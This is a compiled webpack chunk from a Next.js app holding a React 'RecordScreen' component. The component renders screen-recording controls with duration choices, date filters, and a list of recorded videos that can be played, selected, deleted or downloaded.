                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                            className: "w-full relative",
                            children: [
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                    className: "text-[12px] text-[#666666] mt-[10px]",
                                    children: "From"
                                }),
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                    className: "border border-[#E5E5E5] rounded-[3px] h-[24px] w-full text-[10px] text-[rgba(0,0,0,0.9)] px-[16px] flex items-center mb-[5px]",
                                    children: from
                                }),
                                t("To"),
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                    className: "border border-[#E5E5E5] rounded-[3px] h-[24px] w-full text-[10px] text-[rgba(0,0,0,0.9)] px-[16px] flex items-center",
                                    children: to
                                }),
                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(RangePicker, {
                                    className: "absolute w-full h-full top-0 left-0 opacity-0",
                                    ref: rangeDom,
                                    value: dates,
                                    onOpenChange: (open)=>{
                                        ;
                                    },
                                    onCalendarChange: (dates, dateStrings, info)=>{
                                        setDates([
                                            ...dates
                                        ]);
                                        setFrom(dateStrings[0]);
                                        setTo(dateStrings[1]);
                                        ;
                                    },
                                    allowClear: false
                                })
                            ]
                        }),
                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                            className: "".concat(from && to ? "cursor-pointer" : "opacity-60", " mt-[15px] w-full h-[24px] flex justify-center items-center bg-[#FFCF55] rounded-[3px] text-[14px] text-[#000000]"),
                            onClick: ()=>onApply(),
                            children: t("APPLY")
                        }),
                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                            className: "mt-[11px] w-full h-[24px] flex justify-center items-center text-[14px] text-[#000000] bg-[#E5E5E5] rounded-[3px] cursor-pointer",
                            onClick: ()=>setShowDate(false),
                            children: t("CANCEL")
                        })
                    ]
                })
            ]
        });
    // 录制按钮
    const button2 = ()=>/*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)(framer_motion__WEBPACK_IMPORTED_MODULE_21__/* .motion.div */ .E.div, {
            className: "".concat(btnLoading ? "bg-[#F33737]" : "bg-[#FFCF55]", " w-[calc(50%-5px)] h-[35px] px-[10px] rounded-[8px] flex justify-center items-center cursor-pointer relative Blds:w-[152px]"),
            onClick: (e)=>{
                e.stopPropagation();
                if (btnLoading) {
                    stop();
                } else {
                    setShowRecordTime((val)=>!val);
                }
            },
            children: [
                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("span", {
                    className: "".concat(btnLoading ? "text-[#FFF]" : "text-[#000]", " text-[14px] mr-[16px]"),
                    children: btnLoading ? t("Stop") : t("Record Now")
                }),
                !btnLoading && /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(framer_motion__WEBPACK_IMPORTED_MODULE_21__/* .motion.div */ .E.div, {
                    initial: {
                        rotate: 0
                    },
                    animate: {
                        rotate: showRecordTime ? 180 : 0
                    },
                    transition: {
                        duration: 0.2
                    },
                    children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_8___default()), {
                        src: "/images/record-screen/drop-down.svg",
                        width: 20,
                        height: 20,
                        alt: "drop down"
                    })
                }),
                btnLoading && /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                    className: "w-[20px] h-[20px] border-[3px] border-[#FFF] border-b-[#F33737] rounded-[50%] inline-block box-border animate-spin"
                }),
                showRecordTime && /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)(framer_motion__WEBPACK_IMPORTED_MODULE_21__/* .motion.div */ .E.div, {
                    initial: {
                        opacity: 0
                    },
                    animate: {
                        opacity: 1
                    },
                    transition: {
                        duration: 0.2
                    },
                    className: "w-full drop-shadow-[0_0_3px_rgba(0,0,0,0.1)] bg-[#FFF] rounded-[6px] flex flex-col text-[14px] text-[#666666] absolute top-[38px] py-[5px] z-30 relative",
                    onClick: (e)=>{
                        e.stopPropagation();
                    },
                    children: [
                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                            className: "w-full px-[17px] py-[2px] cursor-pointer",
                            onClick: (e)=>{
                                setShowRecordTime(false);
                                setTips("");
                                recordNow("15s");
                            },
                            children: "15S"
                        }),
                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                            className: "w-full px-[17px] py-[2px] cursor-pointer",
                            onClick: (e)=>{
                                setShowRecordTime(false);
                                setTips("");
                                recordNow("30s");
                            },
                            children: "30S"
                        }),
                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                            className: "w-full px-[17px] py-[2px] cursor-pointer",
                            onClick: (e)=>{
                                setShowRecordTime(false);
                                setTips("");
                                recordNow("1m");
                            },
                            children: "1m"
                        }),
                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                            className: "w-full px-[17px] py-[2px] cursor-pointer",
                            onClick: (e)=>{
                                setShowRecordTime(false);
                                setTips("");
                                recordNow("2m");
                            },
                            children: "2m"
                        })
                    ]
                })
            ]
        });
    const loading = ()=>/*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
            className: "w-full mt-[11px] px-[16px] Blds:px-[32px] Blds:mb-[13px] Blds:mt-0 flex items-center",
            children: [
                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_8___default()), {
                    src: "/images/record-screen/countdown.svg",
                    width: 28,
                    height: 28,
                    alt: "countdown"
                }),
                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("span", {
                    className: "ml-[3px] text-[13px] text-[#007AFF]",
                    children: [
                        t("Recording Time remaining"),
                        "\xa0"
                    ]
                }),
                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("span", {
                    className: "text-[13px] text-[#F33737]",
                    children: formatSeconds(countdown)
                })
            ]
        });
    return /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
        className: (_index_module_scss__WEBPACK_IMPORTED_MODULE_22___default().box),
        children: [
            tips && /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                className: "w-full bg-[#FFF] drop-shadow-[0_0_12px_rgba(0,0,0,0.13)] rounded-[10px] flex flex-col justify-center items-center mb-[10px] p-[15px] relative",
                children: [
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                        className: "w-full flex justify-end pb-[10px]",
                        children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_8___default()), {
                            src: "/images/record-screen/close.svg",
                            width: 20,
                            height: 20,
                            alt: "close",
                            onClick: ()=>{
                                setTips("");
                            }
                        })
                    }),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                        className: "text-[13px] text-[#F11E34] font-[600]",
                        children: tips
                    }),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                        className: "w-full flex justify-center pt-[8px]",
                        children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_8___default()), {
                            src: "/images/record-screen/warning.svg",
                            width: 30,
                            height: 30,
                            alt: "warning"
                        })
                    })
                ]
            }),
            btnLoading && /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                className: "w-full Bld:hidden",
                children: loading()
            }),
            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                className: "bg-[#FFF] drop-shadow-[0_0_12px_rgba(0,0,0,0.13)] rounded-[10px] Bxl:h-[calc(var(--vh2)*100-90px)] Bxls:Headers5:h-[calc(var(--vh2)*100-145px)] Header5:big:h-[calc(var(--vh2)*100-210px)] bigs:h-[calc(var(--vh2)*100-270px)] flex flex-col overflow-auto relative",
                onClick: ()=>{
                    setShowRecordTime(false);
                    setShowDate(false);
                },
                children: [
                    btnLoading && /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                        className: "w-full Blds:hidden",
                        children: loading()
                    }),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                        className: "".concat(btnLoading ? "pt-[10px] Blds:pt-[15px]" : "pt-[15px]", " w-full h-[108px] pb-[14px] flex flex-col justify-between Blds:hidden"),
                        children: [
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                className: "flex justify-between px-[10px]",
                                children: [
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(src_components_DateRangeFilter__WEBPACK_IMPORTED_MODULE_16__/* ["default"] */ .Z, {
                                        value: date,
                                        onChange: setDate,
                                        variant: "gray",
                                        className: "w-[calc(50%-5px)] Blds:w-auto Blds:min-w-[172px]"
                                    }),
                                    button2()
                                ]
                            }),
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                className: "flex justify-between px-[16px]",
                                children: [
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(antd__WEBPACK_IMPORTED_MODULE_23__/* ["default"] */ .Z, {
                                        className: "text-[18px] font-[600] text-[#000]",
                                        checked: checkedAll,
                                        onChange: (e)=>onChangeCheckedAll(e),
                                        children: t("All Select")
                                    }),
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_8___default()), {
                                        className: "ml-[10px] cursor-pointer",
                                        src: "/images/record-screen/del.svg",
                                        width: 30,
                                        height: 30,
                                        alt: "del",
                                        onClick: del
                                    })
                                ]
                            })
                        ]
                    }),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                        className: "w-full h-[80px] flex justify-between items-center px-[32px] Bld:hidden",
                        children: [
                            button2(),
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(src_components_DateRangeFilter__WEBPACK_IMPORTED_MODULE_16__/* ["default"] */ .Z, {
                                value: date,
                                onChange: setDate,
                                variant: "gray",
                                className: "w-[calc(50%-5px)] Blds:w-auto Blds:min-w-[172px]"
                            }),
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                className: "flex justify-between items-center",
                                children: [
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(antd__WEBPACK_IMPORTED_MODULE_23__/* ["default"] */ .Z, {
                                        className: "text-[18px] font-[600] text-[#000]",
                                        checked: checkedAll,
                                        onChange: (e)=>onChangeCheckedAll(e),
                                        children: t("All Select")
                                    }),
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_8___default()), {
                                        className: "ml-[21px] cursor-pointer",
                                        src: "/images/record-screen/del.svg",
                                        width: 30,
                                        height: 30,
                                        alt: "del",
                                        onClick: del
                                    })
                                ]
                            })
                        ]
                    }),
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                        ref: dom,
                        className: "flex-1 border-t border-[#E5E7EB] overflow-auto pt-[5px]",
                        children: videoDate.map((item, i)=>/*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                children: [
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                        className: "flex items-center my-[5px] px-[14px] Blds:px-[32px]",
                                        children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(antd__WEBPACK_IMPORTED_MODULE_23__/* ["default"] */ .Z, {
                                            checked: checkedDate.includes(item),
                                            onChange: (e)=>onChangeDateChecked(e, item),
                                            children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                className: "flex justify-center items-center",
                                                children: [
                                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_8___default()), {
                                                        className: "ml-[2px]",
                                                        src: "/images/record-screen/calendar.svg",
                                                        width: 20,
                                                        height: 20,
                                                        alt: "calendar"
                                                    }),
                                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                                        className: "text-[16px] text-[#333333] ml-[10px] font-[600]",
                                                        children: item
                                                    })
                                                ]
                                            })
                                        })
                                    }),
                                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                        className: "flex-wrap grid gap-x-[10px] gap-y-[2px] sm:grid-cols-2 grid-cols-6 flex-1 overflow-auto px-[14px] Blds:px-[32px]",
                                        children: filterVideoData.map((item2, i)=>(()=>{
                                                // 判定日期是否相同
                                                if (item === item2.date.split(" ")[0]) {
                                                    return /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                                        children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                            className: "rounded-[6px] p-[5px] pb-[0] flex flex-col shadow-[0_0_5px_rgba(0,0,0,0.3)] my-[5px]",
                                                            children: [
                                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                                    className: "w-full relative",
                                                                    children: [
                                                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_8___default()), {
                                                                            src: item2.img,
                                                                            width: 0,
                                                                            height: 0,
                                                                            className: "w-full",
                                                                            alt: "video"
                                                                        }),
                                                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                                                                            className: "w-full h-full absolute top-0 left-0 flex justify-center items-center bg-[rgba(0,0,0,0.3)]",
                                                                            onClick: ()=>setVedioUrl(item2.url),
                                                                            children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_8___default()), {
                                                                                src: "/images/record-screen/play.svg",
                                                                                width: 30,
                                                                                height: 30,
                                                                                alt: "video"
                                                                            })
                                                                        })
                                                                    ]
                                                                }),
                                                                /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                                                                    className: "w-full h-[34px] flex items-center justify-between",
                                                                    children: [
                                                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(antd__WEBPACK_IMPORTED_MODULE_23__/* ["default"] */ .Z, {
                                                                            checked: item2.checked,
                                                                            onChange: (e)=>onChangeChecked(e, i),
                                                                            className: "text-[#ac9999] text-[14px]",
                                                                            children: item2.date.split(" ")[1]
                                                                        }),
                                                                        /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_8___default()), {
                                                                            style: {
                                                                                cursor: "pointer"
                                                                            },
                                                                            src: "/images/record-screen/download.svg",
                                                                            width: 20,
                                                                            height: 20,
                                                                            alt: "download",
                                                                            onClick: ()=>downloadVideo(item2.url)
                                                                        })
                                                                    ]
                                                                })
                                                            ]
                                                        })
                                                    }, i);
                                                }
                                            })())
                                    })
                                ]
                            }, i))
                    }),
                    vedioUrl && /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(framer_motion__WEBPACK_IMPORTED_MODULE_21__/* .motion.div */ .E.div, {
                        initial: {
                            opacity: 0
                        },
                        animate: {
                            opacity: 1
                        },
                        transition: {
                            duration: 0.2
                        },
                        className: "absolute w-full h-full bg-[rgba(0,0,0,0.5)] flex justify-center items-center",
                        onClick: ()=>{
                            setVedioUrl("");
                        },
                        children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("video", {
                            controls: true,
                            autoPlay: true,
                            src: vedioUrl,
                            className: "max-w-[90%] max-h-[80%]"
                        })
                    }),
                    isLoading ? /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("div", {
                        className: "absolute inset-0 z-[20] bg-[#FFF] rounded-[10px]",
                        children: /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)(src_components_ContentLoading__WEBPACK_IMPORTED_MODULE_15__/* ["default"] */ .Z, {})
                    }) : null,
                    allVideoData.length > 0 || isLoading || /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                        className: "text-center px-2 absolute inset-0 flex justify-center items-center pointer-events-none",
                        children: [
                            t("It appears theres no data to show here yet"),
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("br", {}),
                            t("If data exists it may take up to 1 hour to download and appear"),
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("br", {}),
                            t("We suggest checking back in a little while")
                        ]
                    })
                ]
            })
        ]
    });
};
/* harmony default export */ __webpack_exports__["default"] = (RecordScreen);


/***/ }),

/***/ 52789:
/***/ (function(module) {

// extracted by mini-css-extract-plugin
module.exports = {"box":"record-screen_box__gfgS7"};

/***/ })

},
/******/ function(__webpack_require__) { // webpackRuntimeModules
/******/ var __webpack_exec__ = function(moduleId) { return __webpack_require__(__webpack_require__.s = moduleId); }
/******/ __webpack_require__.O(0, [5675,5432,9830,5170,1954,1033,8914,3368,1675,5378,1964,607,4567,7642,9368,9774,2888,179], function() { return __webpack_exec__(64066); });
/******/ var __webpack_exports__ = __webpack_require__.O();
/******/ _N_E = __webpack_exports__;
/******/ }
]);